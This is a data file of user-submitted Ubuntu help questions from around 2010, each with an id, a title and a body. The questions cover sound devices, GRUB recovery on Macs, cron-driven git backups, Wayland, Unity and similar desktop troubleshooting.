13501	why audio device shows up in hardware but not under input/output ?	i have a pair of the asus hs-1000w-r wireless headphones with microphone that were working just fine with ubuntu 10.04 . but we had to move cubicles last weekend and since setting the computer back up they are n't available for me to select in the sound preferences input or output tabs . they still appear in the hardware tab with the profile of analog stereo output + analog mono input . when i first connected it , all i had to do to make it work was select it in the output tab , so i 've not done any configuration or driver loading or such . since it is a usb connection i 've unplugged it and plugged it back in , but that did n't seem to change anything .
13506	acer revo ( ion platform ) + maverick + 5.1 surround over hdmi	i 've had a turbulent relationship with my media centre box . every upgrade i perform on it seems to bring a brand new set of audio issues ( the opposite of my desktop where things seem to get better and better ) . it 's a acer revo 3600 . that 's basically an low-end intel atom chip with a nvidia 9400m onboard . on paper that 's perfect for something like a media centre . but having just upgraded to maverick , the sound properties box only wants to offer me stereo sound over hdmi . the exact setup goes : revo - > onkyo av receiver - > lg tv . the onkyo box strips off the audio ( supporting 7.1 -- though we 're only using 6 speakers ) and feeds the video onto the tv . i 'd like to get to a point where ubuntu thinks it 's doing 5.1 over hdmi , upmixing stereo to 6ch and supporting dts/ac3 ( through boxee ) . i 've had this working before but it 's frankly been a bit of a hacktastrophe . the audio chip is recognised as nvidia mcp79/7a hdmi in alsamixer if that helps .
13508	running j2me ( java micro edition ) applications	what 's the easiest way to run j2me ( java phone apps ) on ubuntu ?
13511	no audio on windows guest after installing vbox guest additions	ive posted this here because im not sure whether its a windows or linux problem , so feel free to correct me . ive installed windows 7 on a virtual box vm running on ubuntu , and i have then installed the virtual box guest additions . everything seems to have worked , except for the audio , windows is reporting it does not have any audio output devices installed . this is where im not sure whether its a windows or linux problem . in my vm settings ive got audio set as : alsa audio driver and ich 97 as the controller . ive installed vbox additions 3.2.8 any help would be appreciated .
13521	create pdf from html book	there are some sites that provide books as html pages ( e.g. , legal stuff ) . what can i use to create a pdf book from these pages , based on the already-existing structure ? in windows there is adobe professional ( commercial software ) . i 'm guessing that linux has something free ? a solution involving scripting would be ok for me .
13528	compiling and installing intel graphics card drivers	i have a laptop which has an intel core 2 duo processor with in-built graphics card . i have some issues with the video drivers . i want to know from where i can get latest sources code for the drivers , and also need suggestions about the best way of compiling and installing the driver .
13531	thinclient boot cd	how can i create a bootable cd to run on an old pc accessing an ltsp server . i have found ample documentation on installing an ltsp server , but no reference on how to create a bootable cd . ( pc emulating a thinclient ) . my old pc does not support booting from lan . thank you .
13536	which shell is shipped on default installs ?	recently started playing with ubuntu . i am playing with few shell scripts written for korn shell that i want to edit in ubuntu . what shell does ubuntu runs on ? i guess its bash ? if it is , then is there any way to install or run a particular script under a particular shell ?
13538	problem with permissions after upgrading	a month or so ago i updated from 10.04 to 10.10 , the problem is that after the update process programs that i had full control of no longer respond to me as a regular user , and work normally only when i run them through the terminal using sudo . any idea how to fix that ? the programs that do n't run normally are all the programs i installed before the distribution upgrade . i used sudo update-manager -d to upgrade btw .
13540	xserver nvidia configuration for 10.10	tried to configure and crashed graphic interface at start-up . now stuck with no 3d
13541	step by step guide to install ruby on rails ?	can anybody give me a step by step guide to installing ruby on rails 3 with mysql2 on ubuntu 10.04 ( assuming i have a fresh install of ubuntu 10.04 ) .
13545	enable keyboard media keys	i have one of those fancy keyboards with the extra media keys . for years , i more or less ignored them . then my work got my a macbook , and behold , i got spoiled . now i want them to work when i 'm using my desktop , too . ( ubuntu 10.04 using xfce ) so , how do i do that ? i 'm most interested in the play/pause button and the volume control buttons . i know how to set them to an application , but i do n't know what the command for 'turn volume up ' or 'pause banshee ' . ~~ edit ~~ note : i do not use xubuntu . i tried installing it , but found that adding xfce to ubuntu worked better me than xububtu did . ( this happened back in the spring , and i do n't remember specifically what my issues were )
13547	how to create a personal branch in launchpad ?	i 'm assisting in a project on launchpad - however i do not have write access to that branch . how can i create a branch which i can push to and point people on the team for review ?
13551	trackpad has stopped working after pressing off key , how to reenable ?	further to this issue : my trackpad does n't turn on after i turn it off , before that it works im also exhibiting the same problem , but there doesnt appear to be a solution stated on that question . as my comment states , i dont really care if i ca n't use the off key ( if it is a bug ill just wait till a fix appears ) on my trackpad , but to not have a trackpad at all is a bit of a showstopper , is there anyway to re enable a dead trackpad ? nb im using ubuntu 10.10
13552	access itunes shares from rhythmbox ?	its a bit of a tease that i can see itunes shares on the local network in rhythmbox , but i 'm unable to access them . is there anything i can do to enable access to function ?
13554	how to reinstall or recover grub/mbr on an intel mac ?	i 'm on a triple boot macbook ( osx , ubuntu , windows ) . windows started misbehaving and needed to be re-installed ( as it often does ) . after reinstalling windows , the mbr now points to windows directly and not grub . grub recovery which works on most mrb partition table , did not on this gpt partition table : $ sudo grub-install -- root-directory /media/ubuntu /dev/sda ubiquity knows how to do this correctly . which command can i run to recover grub/mbr on an intel mac ? solution : this was not simple but i found out how to do it . thanks to colin watson and to the debian intelmac [ 1 ] documentation for each giving me parts of the solution . here is what i did : 1 ) boot from livecd 2 ) go to places and mount partition with ubuntu 3 ) press ctrl-l in nautilus or use the mount command to find out where that partition is mounted ( example : /media/123 ) 4 ) open a terminal ( application > accessories > terminal ) 5 ) run the following commands : $ for x in dev proc sys ; do sudo mount -- bind / $ x /media/123/ $ x ; done $ sudo chroot /media/123 # dhclient # apt-get install grub-pc os-prober gptsync # gptsync /dev/sda # say yes # grub-install -- force /dev/sda # tried sda4 ( the ubuntu partition ) but resulted w/blink _ at boot # update-grub # exit $ sudo reboot [ 1 ] http : //wiki.debian.org/intelmac/bootloader # upgrading
13555	how to restore /etc/services ?	using tee without the -- append flag , i just managed to clear out my /etc/services file . can someone send me their copy from maverick ? how to recover from silly mistakes like this on the command line ?
13562	how do we get this magic performance-boosting 200 line patch ?	i read today on phoronix that there is a 200 line patch to the linux kernel which dramatically improves desktop responsiveness . how can ubuntu users get this in a way that 's supported ?
13567	will there be a derivative with upstream gnome 3.0 ?	i want to ask if we 're gon na see a version of ubuntu such as kubuntu for example but with gnome shell and not with unity ? a version called something like gubuntu . thanks in advance for your answers : )
13572	keyboard bug or feature on ubuntu on a mac ?	i have ubuntu 10.04 on my mac , and i have realized that when i pluged in an usb keyboard ( pc ) and turn on the numeric keypad if then i removed the keyboard , the keyboard on the mac ( this sounds odd , not english spoken person sorry ) is completely lost . let me try to explain , when removing the usb keyboard with the numeric keypad activated , the built in mac keyboard is mapped like a numeric keyboard only , j=1 k=2 l=3 u=4 ... and so on , and the others keys doesnt work , and the only way to restore normal behaviour is connecting the usb keyboard and turn off from there the numeric keypad , and then removing the usb . is this behaviour ok ? is this a feature or a bug ? macbook 4.1 regards
13575	is there a way to add google calendar notifications to the indicator message applet ?	is there a way to have google calendar notifications through the message indicator applet without using evolution ? something similar perhaps to `` gmailwatcher '' ? or is there a way to integrate google calendar with reminders into the calendar in ubuntu without evolution ? thanks in advance !
13576	window list panel applet mouse shortcuts	is there a way that i can customize the window list panel applet so that middle clicking closes a program or group of programs ?
13577	can i manually adjust a particular window 's transparency using metacity composite mode ?	compiz does n't work correctly with my graphics card ( intel 82852/855gm ) , so i use metacity composite mode , which works fine . sometimes i 'd like to make a particular window of my choice semi-transparent ( setting up a transparency ratio for all active windows and another for all inactive ones is not enough ) . is there a way to control transparency of a particular window with metacity ?
13582	command to activate ( either run or bring to front if already running ) a program	i want to be able to have a keyboard short-cut to either start or bring to the front a program . ( sqldeveloper if it matters ) i know how to run it , that leaves : 1 ) how do i find out if a program is already running ? 2 ) how do i bring the program the other top of other open windows ? ~~ edit ~~ thanks for the responses so far . when i run either of those commands to get the list of running processes , i get the following : doneill 3492 1 0 nov16 ? 00:00:00 /bin/sh /usr/local/bin/sqldeveloper doneill 3493 3492 0 nov16 ? 00:00:00 /bin/bash /opt/sqldeveloper/sqldeveloper.sh doneill 3495 3493 0 nov16 ? 00:00:00 bash sqldeveloper doneill 3552 3495 1 nov16 ? 00:25:07 /usr/lib/jvm/java-6-sun-1.6.0.22/bin/java -xmx640m -xms128m -xverify : none -doracle.ide.util.addinpolicyutils.override_flag=true -dsun.java2d.ddoffscreen=false -dwindows.shell.font.languages= -xx : maxpermsize=128m -dide.asserttracingdisabled=true -doracle.ide.util.addinpolicyutils.override_flag=true -djava.util.logging.config.file=logging.conf -dsqldev.debug=false -dide.conf= '' /opt/sqldeveloper/sqldeveloper/bin/sqldeveloper.conf '' -dide.startingcwd= '' /opt/sqldeveloper/sqldeveloper/bin '' -classpath ../../ide/lib/ide-boot.jar oracle.ide.boot.launcher i do launch it via the .sh script . it is a java based program . which of those are the one i 'd be interested in ? i tried using the xdotool to raise it , i have n't been successful yet , although i do n't have time tonight to dig into the man pages . if i run xdotool search orac ( 'oracle sql developer ' is the start to the title of the window ) , it returns a bunch of numbers . do one of these represent what i 'm interested in ?
13583	what is the right way to reinstall from source after package was installed via apt ?	i have a python package previously installed via apt ( by default ) . now i want to install new version and compile it manually from the sources with all the required modules . how can i do that ? i suppose that apt-get purge python and then install from sources is not possible because python have lots of dependencies and will uninstall all of them in this case . what is the right way to do that ?
13587	where is coreutils in ubuntu-minimal ?	i want to install ubuntu-minimal . i ca n't see coreutils as a dependency , although there are still plenty of other packages that ubuntu-minimal depends on . will i have to install it seperately or is it a dependency of one of these other packages in ubuntu-minimal ? if so , which one ?
13589	how can i collect all svg icons from my computer ?	i want to make use of all the icons which are installed on my computer to make art , posters and designs , what is the best way of making them all easily browsable from inkscape ?
13590	can i simulate a slow hard drive ?	i have hunch that a certain intermittent bug might only manifest itself when there is a slow disk read rate . troubleshooting is difficult because i ca n't reliably reproduce it . short of simply gobbling io with a high priority process , is there any way for me to simulate having a slow hard drive ?
13599	how to hide process arguments from other users ?	a while ago , i used to use the grsecurity kernel patches , which had an option to hide process arguments from other non-root users . basically this just made /proc/*/cmdline be mode 0600 , and ps handles that properly by showing that the process exists but not its arguments . this is kind of nice if someone on a multiuser machine is running say vi christmas-presents.txt , to use the canonical example . is there any supported way to do this in ubuntu , other than by installing a new kernel ? ( i 'm familiar with the technique that lets individual programs alter their argv , but most programs do n't do that and anyhow it is racy . this stackoverflow user seems to be asking the same question , but actually just seems very confused . )
13613	git on launchpad	i develop most of my code in git repos , now that i 've become slightly more active on launchpad i 've started picking up bazaar which has two `` small '' difference from git 's workflow that ride against how i usually develop code . while i do n't mind using bazaar i 've noticed that launchpad has options to use multiple vsc tools i 'm curious exactly how this works with launchpad with an emphasis on the following : is the repo mirrored as a git repo or a bazaar repository ? if it 's a bazaar repo - how are multiple branches in a git repository mirrored on launchpad ? how are updates from users pushing to the lp branch handled are the branches from git considered read-only or will lp attempt to push them to the git server ? if so under what methods ? ( git+ssh , git daemon , etc ) how often is the lp mirror updated ?
13619	is it likely ubuntu 11.04 will ship with the ~200 line `` miracle '' kernel patch ?	the phoronix article `` the ~200 line linux kernel patch that does wonders '' has created a lot of noise . it seems reports are flooding in that this patch noticeably increases responsiveness during aggressive cpu usage . how likely is it that this patch will make it into the next version of ubuntu ? and will it be backported ?
13620	searching for a command line tagging tool that supports pictures	i am searching a command-line tagging tool that supports ogg- and mp3-tagging and allows to add a picture to the tags . currently i use lltag but that does not support pictures . dagger is the tool i use before but it is lacking picture support as well .
13622	will x.org be available in the future ?	if i understand wayland correctly , this is n't something that 's built into the kernel . if so , then that means that , even when wayland becomes the default display manager , we can do a commandline install and install x.org instead of wayland . in that case , will x.org always be available in the repositories in case someone needs the core features of x.org ?
13629	booting to gnome by default	i 'm currently playing with virtualbox and just installed ubuntu-minimal . i then proceeded to install gnome-core . after reinstalling , i rebooted but i 'm taken back to the cli . how do i load gnome when in command line ? and how do i make it run gnome by default after booting ?
13636	how do we get nvidia to make nvidia-settings a less terrible piece of software ?	ever since i 've been asking this question , the predominant answer has been something to the effect of `` well one day we 'll have free drivers so we can just ignore the problem '' but , in the meantime , nvidia-settings has been so awful it 's been scaring users away from ubuntu for the past 4 years . if you have multiple monitors , or want to change resolution , nvidia-settings gives a horrible experience . on multiple occasions i 've seen it , singlehandedly , convince a user that linux was `` not ready '' . most of the stuff in there does n't even make sense -- for instance there 's a completely useless `` write to xorg.conf '' button that is incredibly scary . so what can we do ?
13639	on screen keyboard with utouch	i want to buy a mecer lucid slate tablet and install unity on the tablet . thus no keyboard . clicking on a text entry field will this bring up a on screen keyboard ? does utouch support a on screen keyboard out of the box or do you have to install a package to have this capability ?
13641	how to print more than 600dpi with cups	my printer ( canon pixma ip5200r ) is capable of printing up to 9.600 x 2.400 dpi . however in 10.04 cups with gutenberg installed lets me choose not more than 600 dpi in the settings . is there a way using only open source to improve print quality ? i already tried editing the *.ppd files to include higher dpi values . this indeed let me choose these values when printing but there was no visible effect on the resolution of prints .
13643	auto-mount usb after reboot	what should i do if i want that my usb key is auto-mounted after reboot ? i mounted it on /media/corsair , but after reboot it is gone ...
13645	typing location path instead of clicking directory buttons in the file picker dialog ?	is there a way to change file picker dialog path input ? i would like to type the path myself instead of clicking buttons to specify the destination path . in nautilus i can hit ctrl+l , to show the path text box . in save page as dialog the same shortcut takes me to name text box .
13646	any software to add subtitles to xvid for playback on a ps3 ?	i watch a lot of foreign language films and it really annoys me to not be able to use my ps3 for them without hard coded subs . is there a piece of software that will let me add the subtitles into the video file ( without re-encoding ) in a way that will allow the ps3 to recognise them ? right now i do n't have the time to set up a server for media streaming and am ideally looking for something that alters the video file so that it can just be put on a usb drive attached to the ps3 . i do n't want to have to rely on having another computer running .
13648	what rendering engine does nautilus use to show html previews/thumbnails ?	i just noticed that html files with css transforms on elements show with the css transforms within the thumbnails on nautilus . so what rendering engine does nautilus use to generate the thumbnails for html files ?
13652	how can i add and keep synced my gmail contacts in evolution ?	there is not much more to say . i 'd like to be able to see my gmail contacts in the contacts section of evolution . i 'm going to change them only from gmail , so a read-only solution will work . what i really want is to be able to access my android phone-book ( stored on gmail ) without retrieving my cellular from my pockets . yes , i 'm that lazy .
13655	why are my trash items not showing ?	there was a folder on my desktop , and i dragged and dropped it onto the trash icon on the bottom right of the screen to see if the folder would be deleted . it got deleted . but when i opened up the trash folder by clicking on that icon , the folder i had deleted was not there . i then clicked on the properties of the trash folder and it said that there are 113 items in the trash while at the bottom of the window it says there is 0 items in the trash . i tried viewing hidden folders but nothing showed up . i also tried to open it as root but nothing showed up again . so does anyone know how i can view the 113 items in the trash ?
13658	how do i change my password ?	how do i change my password for ubuntu ?
13663	i can continue playing a video after i shift-delete it . is the disk-space freed when i close player ?	i 've noticed that i can actually shift-delete ( ie . does n't go to trash ) a video which is currently playing , and it still keeps on playing , even though there is no named reference to it in nautilus or ls ( terminal ) . is the disk-space freed normally when the player has finished with the video ? i assume it is normal behaviour , but it is certainly a new experience for me ( as this was simply not possible in windows ) .
13666	section of the screen gets distorted and pixelated after a few hours	i have a dell 1464 and installed ubuntu on an external drive . after using ubuntu , i realized that a section of 3 or more hours make my screen go pixelated ( actually the blend of colors seems to get distorted and looked hideous ) . i use ati radeon mobility hd 5450 and have installed the required driver . i 'm new to linux . i 'm using ubuntu 10.10 , fglrx 2.8.780-ubuntu2 notice the dark area behind the guy . the color seems to get distored .
13667	videos play without sound	when i play any video on ubuntu 9.10 , volume is not there . is it lacking a package ?
13674	how to connect to the internet ( dsl ) automatically at startup ?	i also have to enter a password to connect . not the root password , but a password i created for the dsl connection when installing ubuntu . so i would like to get rid of the password and connect automatically at startup .
13677	how to use crontab , .netrc , and git push ?	i am in the process of automating the backups from various servers to a central point then pushing those config changes into a git repo so i can track any changes over time . the rest of the scripts are working well , i can copy/rsync the files across the network to a central point . the last script is to get the config files to be put into/updated in repository . the script is as follows : # ! /bin/bash clear servername= '' betty '' scriptdir= '' /home/jon '' gitroot= '' /tmp/git '' temproot= '' /tmp/backups '' backuprootdir= '' /mnt/backups '' echo `` - running as user : $ uid '' echo `` backingup git config on $ servername '' echo `` '' # check to see if root backup folder exists , otherwise create it . if [ -d $ gitroot ] ; then rm -rf $ gitroot fi mkdir $ gitroot cd $ gitroot echo `` - testing if home is where i think it should be ! '' echo $ home echo `` - testing if it can see netrc '' tail $ home/.netrc git clone http : //192.168.10.97:8000/repositories/hoh-config-backups.git cd hoh-config-backups echo `` - copy configuration folders across '' cp -r $ backuprootdir/configuration/* $ gitroot/hoh-config-backups/ cp -r $ backuprootdir/scripts $ gitroot/hoh-config-backups/ git add . git commit -a -m `` committing any new configuration changes ! '' git push origin master echo `` '' echo `` git repo updated '' echo `` '' echo `` - backing up this script '' firewigscriptloc= '' $ backuprootdir/scripts/ $ servername '' if [ ! -d $ firewigscriptloc ] ; then mkdir $ firewigscriptloc fi cp /home/jon/gitconfig.sh $ firewigscriptloc the git repo is on a different machine in the network using apache and http-backend.exe ( smart http protocol ) . if i run this script as me `` jon '' it works . if i run it in crontab it fails . git uses the /home/jon/.netrc file for authentication : machine 192.168.10.97 login gitconfig password 1234579 the log from crontab is : term environment variable not set . - running as user : 1000 backingup git config on betty - testing if home is where i think it should be ! /home/jon - testing if it can see netrc machine 192.168.10.97 login gitconfig password 1234579 got 08de5bc2b27b4940d9412256e76d5e3c3d9dbcdd walk 08de5bc2b27b4940d9412256e76d5e3c3d9dbcdd got be880f2d306778a538d592e7a02eb19f416612f7 got bd387e8def9f77aafa798bf53e80d949aba443e8 got 1bc1a59e12775841d4c59d77c63b8a73823138c2 walk bd387e8def9f77aafa798bf53e80d949aba443e8 getting alternates list for http : //192.168.10.97:8000/repositories/hoh-config-backups.git got 030512237bca72faf211e0e8ec2906164eac34f6 got 9bc2f575240bc1f61ff7d69777ce1a165d06b184 got b8400f7f01429104a9d4786a6bb1a16d293e37c1 got 2403b5bf611010e0b401f776f0e23b09ce744838 got 1a27944c48269ef3608a8f2466e43402d06faac0 got b686f45b7d57af4fa8ca0d528bb85216d6247e19 getting pack list for http : //192.168.10.97:8000/repositories/hoh-config-backups.git getting index for pack ae881957c0f0e8c22eb6cc889a22ef78eb4ce6ff getting pack ae881957c0f0e8c22eb6cc889a22ef78eb4ce6ff which contains ff84d6d48e9326066438d167a10251218d612b3d walk b686f45b7d57af4fa8ca0d528bb85216d6247e19 got 364e30daec17814073e668f490bb84af891fe1f7 got 23f6497e7f9b80e0d90adad73bd0407a0e5ac6ce got 9e77c47574b5e23ea669afe0c23ab235e4917ee1 got 6654e0d328a216b3783e98c47206cb2d01b3353d got 28821ffd437d2689ffb82c6e4b9c3f5372c95c4b got 8c384a24f645389e4d4b08013c79e9e73a658342 got d203be0123736ee025ce20c081f1489098648dfc got 1852603bf7709e71417d8ccec02390279d533642 got fb753a26b20b04694419fce8ecdaa8dbec105cf1 got 736028997cd84dd1c135f57e9d246674b9cd0b9d got 7af836249e20096d0476a548d5be702a071cdd4b got 240dc39d9db50df63073fc7927b2d002dfa0f54c got 93abd36e3935a01011eb753b635a1a0e984bf31e got c6269e28fecf4d8d0d98b9358aecb3acff02df44 got b0aa29432f73e64032682a351d436c24b14078ab walk 240dc39d9db50df63073fc7927b2d002dfa0f54c got 58fb66d9f35f8a5e32ff4683309c5f0c2a3a03c5 got 0da2def4de0565483cdbe6b87418ee2beb122e58 got 0f6a86c6f87ed52ad2ed01e5c6edd661d364930c got 437a93d27b5bb89c739a0564a34a616e832c3ebe got fe0385abe5c0acd8462268dac330bae00e934f1b got 24259f8f5c5c9ee974a75fe3d1e07c02e3e20fe9 got d29f624bf1a5eceedaa86c10fee35f62747c7d04 got 0154e4c987132585ea7a92b77d02dba285512d6b got eda8bf526567c25ee70addb2ad3c3c6aa57eac77 got 9f3d9d7262d66f9fa4f6a13b7c86199953f4bc4e got 8e20881e19667aa22245d0598646991067455a4d got abb1123145689b35eb19519952c71253ee45fa98 got dfeff593c79b4156ce2ce1adf043d0e80356488c got e20c5b48b1d360e0bcf34189e3f3d2bbf23e92cc got b13eb81cc274780322ecf786372320343926bec9 walk 8de83868b3fac748b0a55eba16c8f668ec852abb got b5961421bbc42afe7a07cc1c8b615aba26ba74d7 got 2650ba819019df4193b482733e29ca79b29f3f2c got b3111e1be8103e91803a97a817ed81f28025aca1 got b060be934d709684f5eb5dad3c03932a3589e864 got cf70d2043f081d7a4438e9d5a290a9f986c84060 got 80bf0f1cc836feab86d6935bb7968d8555a8d531 got da318d167920e34bc6573e4fc236249ccbbee316 got d82ac853d387b760149599e6e1ab96403f6ec672 got 0005f691d1f46550fdb4e56025f52e30a5b18cc2 initialized empty git repository in /tmp/git/hoh-config-backups/.git/ - copy configuration folders across created commit 424df2f : committing any new configuration changes ! 3 files changed , 55 insertions ( + ) , 1 deletions ( - ) create mode 100755 scripts/betty/gitconfig.sh error : can not access url http : //192.168.10.97:8000/repositories/hoh-config-backups.git/ , return code 22 error : failed to push some refs to 'http : //192.168.10.97:8000/repositories/hoh-config-backups.git' git repo updated - backing up this script cp : can not create regular file `/mnt/backups/scripts/betty/gitconfig.sh ' : permission denied my crontab is : # m h dom mon dow command 04 * * * * /home/jon/gitconfig.sh > /tmp/gitconfig.log 2 > & 1 i open it by doing : $ crontab -e i.e . not as root . found out about the userid : jon @ betty : ~ $ id uid=1000 ( jon ) gid=1000 ( jon ) groups=4 ( adm ) ,20 ( dialout ) ,24 ( cdrom ) ,46 ( plugdev ) ,109 ( sambashare ) ,114 ( lpadmin ) ,115 ( admin ) ,1000 ( jon ) here is my $ home/.gitconfig file : [ user ] name = jon hawkins email = jonathan1 @ houseofhawkins.com
13679	will wayland have network transparency ?	the xorg server/client architecture allows for network transparency which means it is possible to start x-clients on a remote machine and display the gui on the local machine ( i.e . via x-forwarding by using ssh ) . will wayland have the same or a similar way of allowing to display the guis of applications on a different system than they are running ? will this feature be required to be there , before any steps are taken to replace xorg with wayland on ubuntu systems ?
13689	is there a way to invert the display of window border decorations ?	all i can describe is that the result will be that the entire title bar will always be placed at the bottom of the window . is this possible ?
13691	how do i configure the width of application launcher ?	is it possible to configure the unity application launcher 's width , so it will be smaller ? how do i do this ?
13693	what type of file am i looking for when attempting to add an executable to startup applications ?	i know in windows it 's a .exe , what about ubuntu ? specifically i removed the startup application hook for docky and for whatever reason docky wo n't add it back in , so i want to add it back in manually . however i 'm not sure what file i am looking for here ... so that brought me to this question , in general what file type am i looking for that is 'executable ' in ubuntu for this purpose ? i 'm assuming there could be many files , or it might not be files at all.. i 'm still shedding off my windows-esque thinking mode , please help : )
13695	does booting on an external hard drive have limitations ?	i 'm planning to make a complete install of ubuntu on an external hard drive in order to use ubuntu without touching my internal hard drive . does it have limitations ? will it perform slower than a `` real '' install or something ?
13705	automatically change terminal colors on remote connection ?	is there a way to automatically apply a terminal profile when connected to a remote machine via ssh ? i 'd like more obvious visual cues that i 'm connected to a remote machine than the user/host displayed on each terminal line . i spend most of my day connected to multiple machines and it can get confusing .
13706	why does /cdrom folder exist ? should n't it be /media/cdrom or /mnt/cdrom ?	can somebody explain the logic behind ubuntu 's cdrom folder in root ? ( /cdrom ) i recall it used to be /media/cdrom or /mnt/cdrom before ( in different distros perhaps ) ? thanks .
13708	how to change the fallback font for missing languages ?	the arabic language in the new ubuntu font is missing , so it has to fallback to the standard font , but the problem is that the standard font is n't good , and i want to replace it with tahoma . is there a way to do that or it is built into the font itself ?
13709	is there a keybind to minimize all windows , without a toggle ?	i know about the show desktop keybind ( default ctrl+alt+d ) , which i use often enough . however , i 'm looking for a way to minimize all windows without activating `` show desktop '' . i 'm on a default install ( i.e gnome , metacity & compiz ) . i 've looked through all the locations to configure keybinds , that i know . i 've also looked at the default keybind list in the ubuntu wiki and in the compiz wiki . ( not to mention , searching here . ) i 'm interested in knowing where it is available , if not in gnome/metacity/compiz , or some other way to accomplish this with a keybind .
13726	how to determine what happened and locate the problem when my system freezes ?	hello i had some freezes with my desktop . it is lucid 10.04 on a lenovo 3000 n200 . system freezes completely . how can i locate the problem ?
13730	how can i schedule a nightly reboot ?	i 'm having some periodic issues running a particular application , xbmc . if i use xbmc regularly i do n't seem to have any issues but if i leave it unattended for more than about 12 hours i need to reboot to get it working again . i know a scheduled reboot is not the answer but until i can figure out the problem i need to schedule a reboot each morning so my wife can use it if i 'm away and it does n't get thrown out the window : ) any takers ?
13737	what packages do i install for ffmpeg and libmp3lame ?	on my desktop ubuntu 10.4 i use ffmpeg to convert videos to a format my dvd-player understands . on my laptop running 10.10 i ca n't get the same command to work , what package ( s ) are missing ? ffmpeg -i infile.flv \ -threads 2 -vcodec mpeg4 -vtag divx -acodec libmp3lame \ outfile.avi # ... snip unknown encoder 'libmp3lame' using apt-cache search libmp3lame i 'm told there exist libmp3lame0 and libmp3lame-dev , both of which i 've installed . using acodec libmp3lame0 does n't work either .
13738	how do i query the gvfs metadata for a specific attribute ?	a nice feature in evince is that when you close the program and later reopen the same pdf , it automatically jumps to the page you were reading . the problem i have is that i often read ebooks on several computers and i have to find were i was on the last computer i was reading the pdf . i think syncing these bookmarks in ubuntuone would be a killer feature for people like me who read pdfs on different computers . by investigating a bit , i found where evince was storing this data . it is in the gvfs metadata and it can be accessed for a particular document by typing gvfs-ls -a `` metadata : :evince : :page '' myebook.pdf rather that querying a particular file , i 'd like to query the whole metadata file located in ~/.local/share/gvfs-metadata/home for the home directory , for any file where this particular attribute is set to some value . the biggest issue is that gvfs metadata and stored in binary files and we all know it 's not easy to get something out of a binary file . so , do you know any way to query the gvfs metadata for some attribute ?
13739	what make and model wireless usb dongle works with no issues ?	i have ubuntu desktop edition 10.10 installed on my laptop , and ubuntu netbook edition 10.10 on my partners netbook and i would like to install ubuntu on my dads old and failing desktop but the only thing that is stopping me is the fact that his current usb wireless dongle does n't work with ubuntu ( it 's a belkin wireless g ( model no . f5d7051 ) ) . i just need to find a cheap usb wireless dongle that works out of the box for my dads computer that is compatible with ubuntu , can anyone recommend any ?
13745	guidelines for documenting your contributions to the ubuntu project	i 'm looking for some guidance on how to keep track of the contributions i make to the project so i can present them as evidence when i eventually apply for ubuntu membership . when i was listening to jono bacon 's weekly q & a on ustream earlier tonight , a question was asked about what was meant by a 'sizeable and sustained contribution ' to the project , with respect to an ubuntu membership application , he said that it consisted of a prolonged period of regular contributions which were logged in a wiki . is this the ubuntu wiki , or is that just reserved for high level projects ? also some advice on what 's worth recording ( every single bug report ? ) would also help . thanks .
13747	why does n't the ir module lirc_ene0100 exist in kernel 2.6.36 ?	i have an ir controller that uses the kernel module lirc_ene0100 . i can load it with kernel 2.6.35 but it does n't exist in 2.6.36 and 2.6.37-rc1 .
13751	stop super+m from opening messaging menu	how can i make super+m and super+s work for compiz effects and not for indicator applet & indicator applet session in lucid ?
13754	how to set up a working vpn ?	i 've tried to set up a vpn server on my copy of ubuntu 10.10 with insuccess . community material on the topic is little and poorly documented ( clients only information , scenario-specific information , wip pages , ... ) what i need in specific is tunnelling of traffic over https to go around a proxy server that only allows http and https protocols . what i did try is following this ubuntugeek.com guide . i 've gone through each step ( here are my config files ) , set up an account through dyndns.com , set up port forwarding and set up a vpn on my copy of windows 7 : endpoint : redacted username : badp ( i also tried delta ) password : redacted i 've also turned on logging on the windows 7 side of things and attempted to connect from an unfiltered location . from the logs , it seems like the connection is dropped right after authentication takes place . where did i go wrong ? was there a guide on the ubuntu official resources i could 've tried instead ?
13755	how to patch the kernel to decrease speed up ubuntu desktop latency by a factor of ten	i read about a recent patch for linux that cuts the desktop latency by a factor of ten . is this patch available for ubuntu , and if so where . if not , how easy is it to patch a kernel . what tools do i need to accomplish this . the article is located here at omgubuntu .
13758	how can i edit/create new launcher items in unity by hand ?	will unity allow making custom launcher icons from .desktop files or via menu editing system ? ( right now the launcher does n't give the option to `` keep in launcher '' on all programs . for some programs i use , i have to make custom launchers or .desktop files . for instance , daily blender builds are generally just folders with an executable . in basic gnome or kde , i can make a new menu entry with the menu editing system . then , i can also add it to docky either from the menu or by dragging a .desktop file to it . unity launcher does n't support drag and drop , so thats not a bug or anything , but when i open a .desktop file , it has unpredictable results . most time it will not have `` keep in launcher '' . sometime it will have a pinnable item without the .desktop 's icon , and if i pin the item to the launcher , it will not call upon the program again after closing it . i 've also gotten it to just work with a .desktop file for celtx .
13759	why ca n't i configure my touchpad ?	i want to disable my touchpad 's `` tap to click '' feature . searching for this on the internet comes up with suggestions to shut it off in the `` mouse '' preferences , however i am missing the touchpad tab that people keep talking about : the closest official documentation i 've been able to find is here . the touchpad also does n't show up in gpointing-device-settings . unchecking tap_to_click in the /desktop/gnome/peripherals/touchpad/ gconf key does n't seem to do anything .
13767	i am testing the new opera 11 , but it keeps telling me i need to install flash player	how does one go about doing this ?
13768	running ubuntu netbook edition and desktop edition together on the same machine	currently i have installed desktop edition on my netbook . but it feels a little slower for me . so i want to try out netbook edition by having it along with the desktop edition . so are there any problems if both appear together in the grub2 menu , or is there anything else which might cause issues .
13774	evolution contact sync failure in ubuntu one	when do you plan to add evolution contact sync on ubuntu 10.04 ? i know that it is working on ubuntu 10.10 but there are ppl out there who do not like to upgrade to every new ( and experimental , more or less ) os . ubuntu 10.04 is a lts version and it is strange that it takes so long to implement this feature . many potential canonical customers would prefer to use this version , but buying ubuntuone without being able to sync contacts is annoying .
13776	best editor for ubuntu	hello can anybody suggest me the best editor for ubuntu ( 9.10 ) for programming purpose like dreamweaver.and also the command how to install this editor on system .
13779	why is there no more ~/.trash ?	i remember the nice mv somefile ~/.trash command but that folder does not exist on newer ubuntus . does anyone know why ?
13783	external monitor resolution does n't go above 1024x768	i am trying to use a 24 '' external monitor as the primary monitor for my asus eee netbook . when i connect it , it works properly , except the max resolution available is 1024x768 . usually , i 'd go into the xorg.conf and add it , but 10.10 does n't seem to have an xorg.conf . i read on another question here that i could simply go into recovery mode and make one using x -configure and moving the new xorg.conf into /x11/ but that caused x to not even start . i renamed xorg.conf to a temp name for now . what should i be trying ? thanks !
